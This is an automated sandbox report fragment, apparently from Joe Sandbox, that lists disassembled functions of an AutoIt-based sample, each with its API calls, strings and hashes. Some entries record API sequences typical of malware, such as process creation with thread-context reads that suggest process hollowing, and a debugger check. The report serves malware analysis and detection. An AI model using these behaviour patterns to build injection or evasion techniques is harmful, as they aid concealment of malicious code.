                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                          • String ID:
                                                                          • API String ID: 1552873950-0
                                                                          • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                          • Instruction ID: 082f3c23d927ba86df9f262531ba9ec28f657e8e3afa0bca6843431aec14e327
                                                                          • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                          • Instruction Fuzzy Hash: E5515DB1D04258AFDF2A9F64CC81A9EBBB9EF48300F10459EF20DA7241DB755A91CF58
                                                                          Function 0033470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                          • String ID:
                                                                          • API String ID: 2782032738-0
                                                                          • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                          • Instruction ID: 0607171fcca184072673aeaaf2dfb5840113c97d9d79c3221a4bca774741b2d6
                                                                          • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                          • Instruction Fuzzy Hash: 7141D775B007469BDB1ACF69D8C09AE77A5EF42360F24817DE825CB650E771FD818B40
                                                                          Function 00314C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: AU3!P/:$EA06
                                                                          • API String ID: 4104443479-4289271907
                                                                          • Opcode ID: 070ffcfc78f0340b77e1483ea5dfaf6a1b1ab7d264f9896f443cac541248c597
                                                                          • Instruction ID: 8f110875a49baef399264d6daf78ca9d8e2d3bd294ea78665648e1cd5f85a617
                                                                          • Opcode Fuzzy Hash: 070ffcfc78f0340b77e1483ea5dfaf6a1b1ab7d264f9896f443cac541248c597
                                                                          • Instruction Fuzzy Hash: CE414D72A0415867DF2F9B64E8A17FE7FA69B4D300F684475EC829F283D6209DC583A1
                                                                          Function 00317285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0034EA39
                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0034EA83
                                                                            • Part of subcall function 00314750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00314743,?,?,003137AE,?), ref: 00314770
                                                                            • Part of subcall function 00330791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003307B0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                                          • String ID: X
                                                                          • API String ID: 3777226403-3081909835
                                                                          • Opcode ID: 2c9b2df2afd9de33bf9bd4e94b36a46d797c02ce24ffb43399ff234f8b60b371
                                                                          • Instruction ID: fad4a05975f6eb439ce88ed51b01f2fe26d50c37968b8c8b5272a903db8d524d
                                                                          • Opcode Fuzzy Hash: 2c9b2df2afd9de33bf9bd4e94b36a46d797c02ce24ffb43399ff234f8b60b371
                                                                          • Instruction Fuzzy Hash: C321C070A042589BCB079F98D845BEE7BFCAF48314F04441AE408EB241DBB45A898FA1
                                                                          Function 00378D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock_memmove
                                                                          • String ID: EA06
                                                                          • API String ID: 1988441806-3962188686
                                                                          • Opcode ID: 7c08e9d65569698bbf1189c8621e415e34c80df89faeaa6fb417336c1836a140
                                                                          • Instruction ID: 373962276a6d4e73d692c88e10916a9de03441b5e0c7a95ee45854c8f6c07eca
                                                                          • Opcode Fuzzy Hash: 7c08e9d65569698bbf1189c8621e415e34c80df89faeaa6fb417336c1836a140
                                                                          • Instruction Fuzzy Hash: 3D01F9719442187EDB29CBA8C856EEEBBF8DB11301F00419EF556D6181E978A6048B60
                                                                          Function 003798E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 003798F8
                                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0037990F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Temp$FileNamePath
                                                                          • String ID: aut
                                                                          • API String ID: 3285503233-3010740371
                                                                          • Opcode ID: d98c6326713e621dfc47af555e58720c96b573ac0758e6b42317a1e389b4dbca
                                                                          • Instruction ID: 8e1dd24e0b2cc811420081aa76b64a07141f32d3d1881b4db232873154649fb3
                                                                          • Opcode Fuzzy Hash: d98c6326713e621dfc47af555e58720c96b573ac0758e6b42317a1e389b4dbca
                                                                          • Instruction Fuzzy Hash: 73D05E7954030DAFDB519BA0DC0EFEA773CE704700F0006B2BA94D10A1EAB19A988B91
                                                                          Function 0038CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fe0852a9fecb1a014f5f517ec707c96017c3524630dd6ab02a84fc326679b607
                                                                          • Instruction ID: 1c4f48b85269f67e3747c019a02a8269269792c5d5d859fc0fad09affccbd877
                                                                          • Opcode Fuzzy Hash: fe0852a9fecb1a014f5f517ec707c96017c3524630dd6ab02a84fc326679b607
                                                                          • Instruction Fuzzy Hash: 5CF15771A083409FCB15EF28C480A6ABBE5FF89314F14896EF9999B351D730E945CF92
                                                                          Function 0031434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00314370
                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00314415
                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00314432
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_$_memset
                                                                          • String ID:
                                                                          • API String ID: 1505330794-0
                                                                          • Opcode ID: adc67e73c7bb16f4f0fb101ed548bb76c47af69fe79ef0625aa97160dbce41fb
                                                                          • Instruction ID: 91b8220d47465f70a766153fc354e1c78a7cc9dc0908b41c6a3e78671cf14c42
                                                                          • Opcode Fuzzy Hash: adc67e73c7bb16f4f0fb101ed548bb76c47af69fe79ef0625aa97160dbce41fb
                                                                          • Instruction Fuzzy Hash: 77313EB05057019FD726DF25E8846DBBBE8FB5C309F000D2EF59A86251E771A988CB52
                                                                          Function 0033571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __FF_MSGBANNER.LIBCMT ref: 00335733
                                                                            • Part of subcall function 0033A16B: __NMSG_WRITE.LIBCMT ref: 0033A192
                                                                            • Part of subcall function 0033A16B: __NMSG_WRITE.LIBCMT ref: 0033A19C
                                                                          • __NMSG_WRITE.LIBCMT ref: 0033573A
                                                                            • Part of subcall function 0033A1C8: GetModuleFileNameW.KERNEL32(00000000,003D33BA,00000104,?,00000001,00000000), ref: 0033A25A
                                                                            • Part of subcall function 0033A1C8: ___crtMessageBoxW.LIBCMT ref: 0033A308
                                                                            • Part of subcall function 0033309F: ___crtCorExitProcess.LIBCMT ref: 003330A5
                                                                            • Part of subcall function 0033309F: ExitProcess.KERNEL32 ref: 003330AE
                                                                            • Part of subcall function 00338B28: __getptd_noexit.LIBCMT ref: 00338B28
                                                                          • RtlAllocateHeap.NTDLL(01130000,00000000,00000001,00000000,?,?,?,00330DD3,?), ref: 0033575F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                          • String ID:
                                                                          • API String ID: 1372826849-0
                                                                          • Opcode ID: 6ceacbc72b5f44e5c11ec43a2db3f5cdc955b40caa1b9f6891f324c5f9d95e5a
                                                                          • Instruction ID: 11386c740923c3d4c2df2c13ed7e258aeda5a492393086d5a247e84824cb58b3
                                                                          • Opcode Fuzzy Hash: 6ceacbc72b5f44e5c11ec43a2db3f5cdc955b40caa1b9f6891f324c5f9d95e5a
                                                                          • Instruction Fuzzy Hash: 6E01B135641B02DAD6132B38ECC2A6E738C9B82762F110936F8059E191DFB09C0046A1
                                                                          Function 003798A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00379548,?,?,?,?,?,00000004), ref: 003798BB
                                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00379548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003798D1
                                                                          • CloseHandle.KERNEL32(00000000,?,00379548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003798D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleTime
                                                                          • String ID:
                                                                          • API String ID: 3397143404-0
                                                                          • Opcode ID: 03eb5ccc56b0e5fa2b35868eae556e250ae3c14beec98d19a26efd724b5c2737
                                                                          • Instruction ID: 831247614b7ad7c3a54a170df2475e5da3380da88ceac45badbeea3c34fb5103
                                                                          • Opcode Fuzzy Hash: 03eb5ccc56b0e5fa2b35868eae556e250ae3c14beec98d19a26efd724b5c2737
                                                                          • Instruction Fuzzy Hash: A9E08632140214BBD7331B64EC09FDA7B1DEB06760F108222FB14B90E087B2151197D8
                                                                          Function 00378D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00378D1B
                                                                            • Part of subcall function 00332D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00339A24), ref: 00332D69
                                                                            • Part of subcall function 00332D55: GetLastError.KERNEL32(00000000,?,00339A24), ref: 00332D7B
                                                                          • _free.LIBCMT ref: 00378D2C
                                                                          • _free.LIBCMT ref: 00378D3E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                          • Instruction ID: 521457936615add4366933735fb3fc035fb1aed53db66a25673e339da1f30c1b
                                                                          • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                          • Instruction Fuzzy Hash: 7CE012B16416014ACB36A678AD88A9353DC4F5C352B25491DB41DDB186DF68F8428124
                                                                          Function 0031A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CALL
                                                                          • API String ID: 0-4196123274
                                                                          • Opcode ID: 837ad94e1884c1efc9b1d9fada5ac5b59ce574b6e9852a44ac12ceb4b572a297
                                                                          • Instruction ID: 75f6c627729ef59055b5510d0d39fcd4e45f8725be5473c9d470fd68cf076f44
                                                                          • Opcode Fuzzy Hash: 837ad94e1884c1efc9b1d9fada5ac5b59ce574b6e9852a44ac12ceb4b572a297
                                                                          • Instruction Fuzzy Hash: B4225A70509701DFC72ADF14C490AAABBE5BF89305F15896DE89A8B361D731EC85CB82
                                                                          Function 012F94E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 012F953A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID: D
                                                                          • API String ID: 963392458-2746444292
                                                                          • Opcode ID: 6cb96521d7c40653040d1dd33bb025be60ddcfc4f79d8507ccbbce5ff7b1491f
                                                                          • Instruction ID: 16a13d4cd84b71ff702e06d8b8248ad64339d18c0134c238f2786dafedb3ae1f
                                                                          • Opcode Fuzzy Hash: 6cb96521d7c40653040d1dd33bb025be60ddcfc4f79d8507ccbbce5ff7b1491f
                                                                          • Instruction Fuzzy Hash: 91014B71910309ABDF24DFE4CC49FFEB378AF44705F40851CBB159A181EAB4A688CB61
                                                                          Function 012F844D Relevance: 3.4, APIs: 2, Instructions: 400processthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 012F8C7D
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012F8CA1
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012F8CC3
                                                                          • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 012F8FCC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 572931308-0
                                                                          • Opcode ID: 0c26ce5ed657937ab7cef85eaaffec4c201bc4c0441aa9bb0c46e3760ea72e56
                                                                          • Instruction ID: ca7c8f4b74994a9706118602f9f32ea39acc9131717e23d7c8770977cf51ab8b
                                                                          • Opcode Fuzzy Hash: 0c26ce5ed657937ab7cef85eaaffec4c201bc4c0441aa9bb0c46e3760ea72e56
                                                                          • Instruction Fuzzy Hash: 6312CF24E24658C6EB24DF64D8507DEB232EF68300F1094ED910DEB7A5E77A4E81CF5A
                                                                          Function 00317A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 40fbce4a1fea4cfe3bf1a015a5a2827c9472d34ae18aa590b79f6fb0e3b65f37
                                                                          • Instruction ID: 40c85e33436d3e68e6e994da3dc4237fdf8613681e5e374dad40cf117d305a7c
                                                                          • Opcode Fuzzy Hash: 40fbce4a1fea4cfe3bf1a015a5a2827c9472d34ae18aa590b79f6fb0e3b65f37
                                                                          • Instruction Fuzzy Hash: 183187B1604506AFC709DF68C8D1DA9B3B9FF4C310B198629E519CB791EB30E950CB90
                                                                          Function 003147D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsThemeActive.UXTHEME ref: 00314834
                                                                            • Part of subcall function 0033336C: __lock.LIBCMT ref: 00333372
                                                                            • Part of subcall function 0033336C: DecodePointer.KERNEL32(00000001,?,00314849,00367C74), ref: 0033337E
                                                                            • Part of subcall function 0033336C: EncodePointer.KERNEL32(?,?,00314849,00367C74), ref: 00333389
                                                                            • Part of subcall function 003148FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00314915
                                                                            • Part of subcall function 003148FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0031492A
                                                                            • Part of subcall function 00313B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00313B68
                                                                            • Part of subcall function 00313B3A: IsDebuggerPresent.KERNEL32 ref: 00313B7A
                                                                            • Part of subcall function 00313B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,003D52F8,003D52E0,?,?), ref: 00313BEB
                                                                            • Part of subcall function 00313B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00313C6F
                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00314874
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                          • String ID:
                                                                          • API String ID: 1438897964-0
                                                                          • Opcode ID: 26ea74eb894fe26a97f02c10178ac54ea3645890e672bfb5391e5b5282af3422
                                                                          • Instruction ID: 34f9178639da2e4c02b50a746f6f581c7f148ca0805d6613043c9ffd27550e0b
                                                                          • Opcode Fuzzy Hash: 26ea74eb894fe26a97f02c10178ac54ea3645890e672bfb5391e5b5282af3422
                                                                          • Instruction Fuzzy Hash: 26119D719093019FC706EF69E84598ABBF8EF89750F10891FF051872B1DBB19689CB92
                                                                          Function 00330DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0033571C: __FF_MSGBANNER.LIBCMT ref: 00335733
                                                                            • Part of subcall function 0033571C: __NMSG_WRITE.LIBCMT ref: 0033573A
                                                                            • Part of subcall function 0033571C: RtlAllocateHeap.NTDLL(01130000,00000000,00000001,00000000,?,?,?,00330DD3,?), ref: 0033575F
                                                                          • std::exception::exception.LIBCMT ref: 00330DEC
                                                                          • __CxxThrowException@8.LIBCMT ref: 00330E01
                                                                            • Part of subcall function 0033859B: RaiseException.KERNEL32(?,?,?,003C9E78,00000000,?,?,?,?,00330E06,?,003C9E78,?,00000001), ref: 003385F0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
